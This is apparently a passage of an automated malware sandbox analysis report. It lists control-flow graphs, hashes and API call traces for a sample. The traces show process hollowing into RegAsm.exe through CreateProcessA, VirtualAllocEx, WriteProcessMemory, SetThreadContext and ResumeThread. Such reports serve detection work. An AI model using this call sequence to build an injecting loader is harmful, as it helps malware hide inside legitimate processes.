                                                                                                                                                                                                                                          control_flow_graph 327 5a46f88-5a47021 329 5a47023-5a4703a 327->329 330 5a4706a-5a47092 327->330 329->330 333 5a4703c-5a47041 329->333 334 5a47094-5a470a8 330->334 335 5a470d8-5a4712e 330->335 336 5a47064-5a47067 333->336 337 5a47043-5a4704d 333->337 334->335 342 5a470aa-5a470af 334->342 344 5a47174-5a47262 CreateProcessA 335->344 345 5a47130-5a47144 335->345 336->330 338 5a47051-5a47060 337->338 339 5a4704f 337->339 338->338 343 5a47062 338->343 339->338 346 5a470b1-5a470bb 342->346 347 5a470d2-5a470d5 342->347 343->336 363 5a47264-5a4726a 344->363 364 5a4726b-5a47350 344->364 345->344 353 5a47146-5a4714b 345->353 348 5a470bd 346->348 349 5a470bf-5a470ce 346->349 347->335 348->349 349->349 352 5a470d0 349->352 352->347 355 5a4714d-5a47157 353->355 356 5a4716e-5a47171 353->356 357 5a47159 355->357 358 5a4715b-5a4716a 355->358 356->344 357->358 358->358 359 5a4716c 358->359 359->356 363->364 376 5a47360-5a47364 364->376 377 5a47352-5a47356 364->377 379 5a47374-5a47378 376->379 380 5a47366-5a4736a 376->380 377->376 378 5a47358 377->378 378->376 382 5a47388-5a4738c 379->382 383 5a4737a-5a4737e 379->383 380->379 381 5a4736c 380->381 381->379 384 5a473c2-5a47415 382->384 385 5a4738e-5a473a4 382->385 383->382 386 5a47380 383->386 391 5a47397-5a473a4 384->391 392 5a47417-5a47449 384->392 389 5a473ab-5a473b7 385->389 386->382 389->384 391->389 393 5a47450-5a47475 392->393 394 5a4744b 392->394 395 5a47490-5a47494 393->395 394->393 396 5a47496-5a474a1 395->396 397 5a47477-5a47489 395->397 398 5a4848c-5a48495 396->398 397->395 399 5a4748b 397->399 400 5a48497 398->400 401 5a4849e-5a484a9 398->401 399->395 400->400 401->398
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A4724F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                          • Opcode ID: 129b39828ed453574b5eaa3443a15227c7147df53b2a5312f3dfd3e611d82c5e
                                                                                                                                                                                                                                          • Instruction ID: 554999a3aa1bb2bcdcdfc209b4c33b3cc22150c42d0a6088d9b3f3b8f915129f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 129b39828ed453574b5eaa3443a15227c7147df53b2a5312f3dfd3e611d82c5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C11671D002698FDB24CFA8C845BEEBBB1FB49300F0495A9D819B7250DB749A86CF95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 402 5a46bfb-5a46c6b 405 5a46c82-5a46ce3 WriteProcessMemory 402->405 406 5a46c6d-5a46c7f 402->406 408 5a46ce5-5a46ceb 405->408 409 5a46cec-5a46d3e 405->409 406->405 408->409
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A46CD3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                                                                                          • Opcode ID: 4907f536c116953e5ad5d0dd42e9fded5936519e38ecce4b8d3fa0ba58c21a19
                                                                                                                                                                                                                                          • Instruction ID: f39f400c5c9f573ab8344eeec43fbbde9fd0fb7fba33b97de7196c1d548811a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4907f536c116953e5ad5d0dd42e9fded5936519e38ecce4b8d3fa0ba58c21a19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8341A8B5D012589FCF00CFA9D984AEEBBF1FB49310F14902AE819B7240D779AA45CF64

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 414 5a46c00-5a46c6b 416 5a46c82-5a46ce3 WriteProcessMemory 414->416 417 5a46c6d-5a46c7f 414->417 419 5a46ce5-5a46ceb 416->419 420 5a46cec-5a46d3e 416->420 417->416 419->420
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A46CD3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                                                                                          • Opcode ID: f2cb9d5bb954b30cdf1d63a493bfcfab947e759f08a396f39a9e79cf2e4ff2a4
                                                                                                                                                                                                                                          • Instruction ID: 8ea60c2b0d17d680b91f5905a6dc72f35294ea4d86b04ed7362c3d038066aa70
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2cb9d5bb954b30cdf1d63a493bfcfab947e759f08a396f39a9e79cf2e4ff2a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641A9B5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE819B7240D779AA41CF64

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 425 175dcc0-175dd23 427 175dd25-175dd52 425->427 428 175dd82-175ddd9 LoadLibraryA 425->428 427->428 438 175dd54-175dd59 427->438 431 175dde2-175de25 428->431 432 175dddb-175dde1 428->432 436 175de35 431->436 437 175de27-175de2b 431->437 432->431 437->436 439 175de2d 437->439 440 175dd7c-175dd7f 438->440 441 175dd5b-175dd65 438->441 439->436 440->428 442 175dd67 441->442 443 175dd69-175dd78 441->443 442->443 443->443 444 175dd7a 443->444 444->440
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0175DDC9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: cd38ad7d8de70404f1dec894e3c281aa97f9760d6836c4d818d38e237f026563
                                                                                                                                                                                                                                          • Instruction ID: 861f57b3e5ff5ad92f8d96325fb29deb75ea141798c4396f493754fa36a09b86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd38ad7d8de70404f1dec894e3c281aa97f9760d6836c4d818d38e237f026563
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F41EEB4E003489FDB64CFE9D884B9DFBF1BB09304F10912AE814AB294D7B49885CF95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A46B8A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 669fd635395b06191b88052d265447b7557d154879ff4574ffa3153717fe3c10
                                                                                                                                                                                                                                          • Instruction ID: 7217a73eb4b23f491816e134d00b05f0bf9ea7643a7e2858af681be8c0ebd0dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 669fd635395b06191b88052d265447b7557d154879ff4574ffa3153717fe3c10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 053188B9D042589FCF10CFA9D880ADEFBB1BB49310F10942AE815BB210D775A946CF69

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 445 5a46ad8-5a46b9a VirtualAllocEx 448 5a46ba3-5a46bed 445->448 449 5a46b9c-5a46ba2 445->449 449->448
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A46B8A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: bac5de8312eb2f314162beed4e3ea44de79be7d83f5f40b0c89d9b7282110274
                                                                                                                                                                                                                                          • Instruction ID: 62b86d75b91d8613af6f523ca5d041bbad065ca16438a7674723ad4fe9affe29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bac5de8312eb2f314162beed4e3ea44de79be7d83f5f40b0c89d9b7282110274
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 293197B9D04258DFCF10CFA9D984ADEFBB1BB49310F10942AE815BB200D775A946CF68
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05A46A67
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                                                                                          • Opcode ID: c50c8955b8199ae492292965af2fdd5a87e250c46c7458c4c21f6ff3156b3628
                                                                                                                                                                                                                                          • Instruction ID: 700bed8b0d2177b75917e3c97ef088704c11ab85ebfa6486735d53e6025930a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c50c8955b8199ae492292965af2fdd5a87e250c46c7458c4c21f6ff3156b3628
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E431ACB5D052589FDB10CFAAD884AEEFBF1BF49310F24802AE415B7240D778A985CF64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05A46A67
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                                                                                          • Opcode ID: fb207505cd5d9a11e79bf2023c8c63d3a1f53a0111a2b121fd544665667bc5c4
                                                                                                                                                                                                                                          • Instruction ID: 28e8d10125e68d8b0727a23c1d37fc7e89caf45f3e958655f03e6ee7756ce2d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb207505cd5d9a11e79bf2023c8c63d3a1f53a0111a2b121fd544665667bc5c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C41BBB5D012589FDB10CFA9D984AEEFBF1BB49310F24842AE415B7240D778AA85CF64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0175DA8F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: c0907a277c560c99393c26d79638ffe82a4ba861656592d85106bc0f8b4364a7
                                                                                                                                                                                                                                          • Instruction ID: 7f04dac1c91502d228d0ee124e2a22361820fddd00679c8a798594ad814e8dcd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0907a277c560c99393c26d79638ffe82a4ba861656592d85106bc0f8b4364a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D63175B9D052589FCB10CFA9E880ADEFBF1BB09310F24902AE818B7310D775A945CF65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 05A46946
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                          • Opcode ID: 8f7217c900aaf45725a4773e3e0325297497dfb9757627ad7e4740ed72a789e8
                                                                                                                                                                                                                                          • Instruction ID: f74f9b59279ddc91fba0ec47bc40002576a36e6c17425c8a748e13130aa27da7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f7217c900aaf45725a4773e3e0325297497dfb9757627ad7e4740ed72a789e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7731C9B4D052189FCF10CFAAD880A9EFBF4BB49320F14942AE815B7300C775A941CFA8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 05A46946
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                          • Opcode ID: 2164062503c7e343de3ca5abc682516f58443437f4f9e271b21e2eb327127d3e
                                                                                                                                                                                                                                          • Instruction ID: 345392e5678fd56a2324cb19d8fc2a583d627001275e8fc425be45e881facd78
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2164062503c7e343de3ca5abc682516f58443437f4f9e271b21e2eb327127d3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC31CBB4D012189FCF10CFA9D980AEEFBB0BB49320F14942AE815B7300C775A941CFA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0175EE89
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 5de779cc4db63a3cfb45eee67287fde5d3bdc950a4c521b77fa64534e2815468
                                                                                                                                                                                                                                          • Instruction ID: 01e5a24081efcd9931f09b3bd9424ff158aba6a1dd9084bc82262835950489ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de779cc4db63a3cfb45eee67287fde5d3bdc950a4c521b77fa64534e2815468
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD3174B9D042589FDF10CFA9D984A9EFBF5BB09310F10902AE818B7310D775AA45CF69
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1837810348.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16bd000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d8e7b0e29cfa1196211235a848c145d2d306e80f49b56c6cc279d687fd8d0253
                                                                                                                                                                                                                                          • Instruction ID: 57b509d70cc31a29f9a225f3def91eb9e952032b0a6d6ef799f9a5b46eb31149
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8e7b0e29cfa1196211235a848c145d2d306e80f49b56c6cc279d687fd8d0253
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8210071504244DFDB15DF54D9C4B66BBA5FB88328F248569E9090F242C336D487CBA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1837810348.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16bd000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4e94d3bbed420b0e4692876a762ca642a2fb715ffebdd4ecf881764abf235af7
                                                                                                                                                                                                                                          • Instruction ID: 8a824225b26baff55c5c201f6b4601909642a78a4ba4defc708f92ae6a068fb6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e94d3bbed420b0e4692876a762ca642a2fb715ffebdd4ecf881764abf235af7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9921AF754093808FDB13CF24D9D4B56BF71EB86214F2881DAD8448F663C33A944ACB62
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc02b5b708da52c800c8a6eb40f705f458c329436f69c4e001f2f55d68f1877b
                                                                                                                                                                                                                                          • Instruction ID: 53a0c3ca48b7ca4c1f4b049f1b6e7e0653d1ce8f3d524124694afdf663a08851
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc02b5b708da52c800c8a6eb40f705f458c329436f69c4e001f2f55d68f1877b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B41E0B4D043489FDB64CFA9D884B9DFBF1BB09300F249029E824AB290D7B49985CF45

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:30.9%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:30
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                          execution_graph 473 22621a5 476 22621dd 473->476 474 22622eb CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 475 22623ba WriteProcessMemory 474->475 474->476 477 22623ff 475->477 476->474 478 22623aa TerminateProcess 476->478 479 2262404 WriteProcessMemory 477->479 480 2262441 WriteProcessMemory Wow64SetThreadContext ResumeThread 477->480 478->474 479->477 502 930b57 503 930b86 502->503 505 930bd0 VirtualProtect 503->505 504 930ba3 505->504 498 930985 499 930988 498->499 500 930500 VirtualProtect 499->500 501 930a73 499->501 500->501 481 930988 482 93099d 481->482 484 930a73 482->484 485 930500 482->485 486 930f60 VirtualProtect 485->486 488 930fe8 486->488 488->484 489 930b78 490 930b86 489->490 493 930bd0 490->493 491 930ba3 497 930bdc 493->497 494 930f3c 494->491 495 930fab VirtualProtect 496 930fe8 495->496 496->491 497->494 497->495

                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                                          callgraph 0 Function_00930491 1 Function_00930390 2 Function_00930090 3 Function_00930495 4 Function_00930499 5 Function_00930198 6 Function_0093029D 7 Function_0093049D 8 Function_0093039C 9 Function_00930481 10 Function_00930080 11 Function_00930485 12 Function_00930985 45 Function_009304F4 12->45 60 Function_00930500 12->60 67 Function_0093050C 12->67 13 Function_02262530 14 Function_02262630 15 Function_00930384 16 Function_00930284 17 Function_00930489 18 Function_00930988 18->45 18->60 18->67 19 Function_00930188 20 Function_0093048D 21 Function_007DD163 22 Function_009300B0 23 Function_02262605 24 Function_007DD059 25 Function_007DD058 26 Function_009302B4 27 Function_009301B4 28 Function_009304B8 29 Function_009300BC 30 Function_02262809 31 Function_009300A0 32 Function_007DD044 33 Function_009301A8 34 Function_00930BD0 35 Function_009302D0 36 Function_009301D5 37 Function_009300D4 38 Function_009308D8 39 Function_007DD030 40 Function_009302DC 41 Function_009301C0 42 Function_009302C4 43 Function_009300C8 44 Function_009300F0 46 Function_009302F4 47 Function_009301F8 48 Function_009300E4 49 Function_007DD005 50 Function_009302E8 51 Function_009308E8 52 Function_009301EC 53 Function_00931010 54 Function_022621A5 55 Function_00930214 56 Function_00930519 57 Function_00930318 58 Function_0093051D 59 Function_0093011C 61 Function_00930100 62 Function_00930300 63 Function_00930208 64 Function_007DD0E1 65 Function_007DD0E0 66 Function_022625B8 68 Function_0093010C 69 Function_0093030C 70 Function_00930330 71 Function_00930234 72 Function_00930434 73 Function_0093013C 74 Function_0093033C 75 Function_02262589 76 Function_00930521 77 Function_00930525 78 Function_00930224 79 Function_00930324 80 Function_0093012C 81 Function_00930450 82 Function_00930B57 82->34 83 Function_022625E0 84 Function_00930154 85 Function_00930054 86 Function_00930254 87 Function_00930354 88 Function_022626E1 89 Function_0093045C 90 Function_00930540 91 Function_00930B40 92 Function_00930244 93 Function_00930444 94 Function_00930148 95 Function_00930848 96 Function_00930348 97 Function_022625FD 98 Function_00930070 99 Function_00930475 100 Function_00930479 101 Function_00930B78 101->34 102 Function_00930178 103 Function_00930278 104 Function_00930378 105 Function_0093047D 106 Function_022625C8 107 Function_00930562 108 Function_007DD18C 109 Function_00930060 110 Function_00930260 111 Function_00930360 112 Function_00930165 113 Function_007DD187 114 Function_00930468 115 Function_0093026C 116 Function_0093036C

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02262117,02262107), ref: 02262314
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02262327
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(000003C4,00000000), ref: 02262345
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(000003C8,?,0226215B,00000004,00000000), ref: 02262369
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(000003C8,?,?,00003000,00000040), ref: 02262394
                                                                                                                                                                                                                                          • TerminateProcess.KERNELBASE(000003C8,00000000), ref: 022623B3
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003C8,00000000,?,?,00000000,?), ref: 022623EC
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003C8,00400000,?,?,00000000,?,00000028), ref: 02262437
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(000003C8,?,?,00000004,00000000), ref: 02262475
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(000003C4,05080000), ref: 022624B1
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(000003C4), ref: 022624C0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1784243230.0000000002262000.00000040.00000800.00020000.00000000.sdmp, Offset: 02262000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2262000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                          • API String ID: 2440066154-1257834847
                                                                                                                                                                                                                                          • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction ID: 0a8baee4e9a57bf254751a92303187054c3b440f0e67beba57c7e5f36de2d7ba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCB1E67260024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB345D774FA51CB94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
